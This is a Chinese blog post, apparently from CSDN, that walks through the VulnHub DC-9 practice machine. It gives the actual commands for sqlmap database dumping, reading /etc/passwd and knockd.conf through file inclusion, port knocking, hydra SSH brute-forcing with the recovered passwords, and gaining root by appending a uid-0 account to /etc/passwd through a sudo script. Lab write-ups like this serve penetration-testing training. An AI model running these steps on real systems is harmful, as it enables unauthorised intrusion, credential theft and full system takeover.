vulnhub-dc9

于 2022-09-30 14:15:45 发布
阅读量244 收藏
点赞数
分类专栏: 内网 vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55654781/article/details/127122736
版权

web安全

靶机地址

https://www.vulnhub.com/?q=dc-

打开靶机,设置为同一种nat模式

kali 信息收集主机发现 ,并扫描该主机ip

arp-scan -l
nmap -p- -sV 192.168.1.201

在这里插入图片描述

访问192.168.1.201,在search界面可尝试sql注入,用burp抓包,尝试注入

在这里插入图片描述

使用sqlmap注入(路径自定义)

附在线破解网站:https://hashes.com/en/decrypt/hash

python sqlmap.py -r sql.txt --dbs
python sqlmap.py -r sql.txt -D users --tables
python sqlmap.py -r sql.txt -D users -T UserDetails --columns
python sqlmap.py -r sql.txt -D users -T UserDetails -C "username,password" --dump

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

无法登录,重新查找其他数据库,查找到admin transorbital1

python sqlmap.py -r sql.txt ‐D Staff ‐T Users ‐C Username,Password ‐‐dump

在这里插入图片描述

登录页面后,发现可能为文件包含漏洞,?file=…/…/…/…/etc/passwd 无有效信息,

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1LBqgTGM-1664518285510)(../../../../img/dc9/7.png)]

查看knock配置文件?file=…/…/…/…/etc/knockd.conf

关于knock 讲解链接https://blog.csdn.net/nzjdsds/article/details/112476120
在这里插入图片描述

进行敲击,发现ssh可以连接

for x in 7469 8475 9842;do nmap -Pn --max-retries 0 -p $x 192.168.1.201;done

在这里插入图片描述

之前的用户密码分别保存,hydra爆破

hydra -L /root/桌面/1.txt -P /root/桌面/2.txt  ssh://192.168.1.201

在这里插入图片描述

通过ssh登录在,janitor的家目录存在secrets-for-putin的文件中存在密码

在这里插入图片描述

重新爆破

[22][ssh] host: 192.168.1.201   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.1.201   login: janitor   password: Ilovepeepee
[22][ssh] host: 192.168.1.201   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.1.201   login: fredf   password: B4-Tru3-001

在这里插入图片描述

ssh登录fredf,查看有root权限的文件,后发现test可以执行,执行

在上级目录查看test.py

在这里插入图片描述
在这里插入图片描述

脚本内容为将文件内容添加到另外一个文件内容

可以添加一个新的用户到/etc/passwd,然后新添加的用户登陆

Openssl来对密码进行加密,在进行编辑输入到/tmp/new-passwd,最后登录dc9,查看flag

fredf@dc-9:/opt/devstuff/dist/test$ openssl passwd -1 -salt dc9 123456
$1$dc9$3Qf9B8VT49B741CMh3R4m1
fredf@dc-9:/opt/devstuff/dist/test$ echo 'dc9:$1$dc9$3Qf9B8VT49B741CMh3R4m1
fredf@dc-9:/opt/devstuff/dist/test$ echo 'dc9:$1$dc9$3Qf9B8VT49B741CMh3R4m1:0:0:root:/bin/bash' >> /tmp/dc9
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/dc9 /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su dc9

在这里插入图片描述

Vulnhub靶场渗透测试系列DC-9(knockd敲门服务)
qq_45722813的博客
12-12 6528
Vulnhub靶场渗透测试系列DC-9 靶机下载地址:https://www.vulnhub.com/entry/dc-9,412/
vulnhub-DC系列通关记DC1靶机渗透
qq_35258210的博客
02-07 1651
目录 flag1 信息收集 漏洞利用 后渗透 flag2 flag3 flag4 最终flag 该流程图出于:https://blog.csdn.net/weixin_44288604/article/details/108027062 本次学习参考于b站千峰机构的网络安全视频:https://www.bilibili.com/video/BV1i7411G7vm?p=268 这张流程图做得很好借来用用。如有侵权请告知删除 flag1 首先我们在启动DC1靶机后进入到系统只显示
Vulnhub DC-9
Pai_Space
04-11 3153
明确:《中华人民共和国网络安全法》 Description DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The ultimate goal of this challenge is to get root and to read the one and only flag. Linux skill..
Vulnhub-DC-9
KAKA的博客
07-04 497
nmap 扫描获取目标 IP 地址 nmap 扫描目标 IP 地址获得开放端口: 这里仔细看下,可以看到 22 是 filtered,80 开放,22 是被过滤这就很奇怪,针对这个,首先你得看下这篇文章: 保护 SSH 的三把锁 不想看的看下边:(强推看下原文) 简单总结下就是:1.换端口 2.指定用户登入 3.敲门服务 这里重点说下敲门服务就是,你想打开 ssh 大门,打开大门方式是念咒语,你得先去打开其它几扇门才可以打开 SSH 服务,敲门服务必须安装敲门守护进程 knockd,敲门配置在 /etc
vulnhubDC9
qq_54030686的博客
06-24 1083
vulnhubDC9这应该是DC系列的最后一篇,相较于其他靶机而言,会比较难一些,提权的方式也较为多样,本文参考 下面的是官方出的wp,上面为一位师傅写的,简述一些流程主机发现,端口扫描 主机开放了22和80端口,但是22端口为过滤状态,无法进行暴力破解 对80端口开放的服务进行指纹识别,这里使用whatweb,棱洞之类也可以 并未识别到网站使用的框架,只能够自己进行检测,这里使用burp和xray联合进行检测,具体操作方法这里不再进行描述, 经过检测,发现result.php界面存在sql注入,但是
Vulnhub靶机 DC-9
菜浪马废的博客
03-31 583
哇,开心了,DC系列最后一个,加油! 135是靶机 80 22端口 访问主页 bp抓了一下包,看着应该可以注入,跑一下sqlmap 列出了一堆账号密码 sqlmap -u "http://192.168.0.135/results.php" --data "search=1" --dbs sqlmap -u "http://192.168.0.135/results.php" --d...
VulnHub DC-1
weixin_45682839的博客
04-13 353
VnlnHub DC-1靶场攻关攻略记录,五个flag,获得root权限。
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1406
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub--DC-1--flag
记录笔记
04-08 319
配置网络为nat模式(你需要知道你的靶机的IP网段,最好与kali攻击机处于同一网段) 查看net模式下的网段 192.168.15.0 我们查看一下kali的IP地址 kali的IP192.168.15.142 Nmap -Sp 192.168.15.0/24扫描存活主机 我们就的到了DC-1的ip192.168.15.143 我们扫描一下看下开放的端口 目标靶机开放ssh远程连接服务,HTTP服务 whatweb http://192.168.15.143扫描网站指纹信息 或者使用火狐所带的
Vulnhub靶场实战---DC-9
一期一会的博客
12-23 2329
​ 0x00 环境准备 1.官网下载地址: https://www.vulnhub.com/entry/dc-9,412/ 2.下载完成之后直接导入vm,使用NAT模式连接,保持在同一网段 攻击机:kali (192.168.88.130) 靶机:DC-8 (192.168.88.132) 0x01 信息收集 老办法,使用arp-scan -l 找到目标主机,目标主机ip为192.168.88.132 查看开放端口,22端口被过滤,登录80端口查看 nmap -sV -p- -A 192.168.88.
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 3104
Vulnhub靶机渗透学习——DC-9
vulnhub靶机DC-9渗透测试
Long_gone的博客
01-21 2452
一、信息收集 首先用netdiscover确定靶机IP: 确定靶机IP为:192.168.1.109后开始扫描它的端口开放情况: namp -sV -A -p 0-65535 1192.168.1.109 发现它只开放了22和80端口,发现ssh服务被过滤掉了,这就使我们用不了ssh服务,先不管它。然后先访问一下80端口: 是一个这样的页面,其中还有4个选项,依次点开以后并没有什么发现,但...
看完这篇 教你玩转渗透测试靶机vulnhub——DC9
Aluxian_的博客
04-19 6477
Vulnhub靶机DC9渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:SQL注入:③:文件包含:④:端口敲门: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC9 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://dow
vulnhub-DC-9靶机渗透记录(适合新手详细版)
m0_62584974的博客
09-09 1356
vulnhub-DC-9靶机渗透记录,超详细,适合新手
Vulnhub靶机:DC-9渗透详细过程(DC系列完结)
IerkeU的博客
03-28 3778
信息收集 nmap -A -sV -p- -T4 192.168.132.156 目前发现只开放80端口,去web页面搜索一下 有一处后台登陆、一处搜索处 在搜索处1' or 1=1#页面返回正常,1' or 1=2#报错,BP抓包发现是POST 输出文件:sql进入kali一把梭 SQLMAP sqlmap -r sql --dbs --dump sqlmap -r sql -D users -T UserDetails -C id,username,password --dump 将admin
靶场练习第十七天~vulnhub靶场之dc-9
qq_57976347的博客
02-16 845
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-9.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -p- 192.168.101.122 2.网站的信息收集 (1)靶机开放了80端口,先访问
记一次vulnhub|渗透测试 DC-9
crispr的博客
01-15 2568
vulnhub DC-9 0X01 Main Point 1.Sqlmap的基本使用 2.LFI的利用 3.Port Knocking–端口敲门服务 4.hydra的基本使用–爆破ssh 5.sudo权限的枚举 0X02 前期嗅探和端口探测 kali下使用arp-scan获取靶机IP 得到靶机IP 172.20.10.10, nmap探测靶机开放的端口服务; 靶机开放了80和22端...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值